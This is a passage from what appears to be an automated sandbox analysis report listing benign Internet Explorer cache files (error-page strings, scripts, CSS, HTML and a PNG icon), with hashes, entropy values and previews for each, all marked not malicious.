                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\errorPageStrings[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\errorPageStrings[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\errorPageStrings[3]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4720
                  Entropy (8bit):5.164796203267696
                  Encrypted:false
                  SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                  MD5:D65EC06F21C379C87040B83CC1ABAC6B
                  SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                  SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                  SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                  Malicious:false
                  Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[3]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[4]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[5]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[6]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):12105
                  Entropy (8bit):5.451485481468043
                  Encrypted:false
                  SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                  MD5:9234071287E637F85D721463C488704C
                  SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                  SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                  SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                  Malicious:false
                  Preview:...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\NewErrorPageTemplate[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\NewErrorPageTemplate[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1612
                  Entropy (8bit):4.869554560514657
                  Encrypted:false
                  SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                  MD5:DFEABDE84792228093A5A270352395B6
                  SHA1:E41258C9576721025926326F76063C2305586F76
                  SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                  SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                  Malicious:false
                  Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dnserror[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dnserror[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2997
                  Entropy (8bit):4.4885437940628465
                  Encrypted:false
                  SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                  MD5:2DC61EB461DA1436F5D22BCE51425660
                  SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                  SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                  SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                  Malicious:false
                  Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[2]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[3]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                  Category:dropped
                  Size (bytes):748
                  Entropy (8bit):7.249606135668305
                  Encrypted:false
                  SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                  MD5:C4F558C4C8B56858F15C09037CD6625A
                  SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                  SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                  SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                  Malicious:false
                  Preview:.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[4]

                  Download File
                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
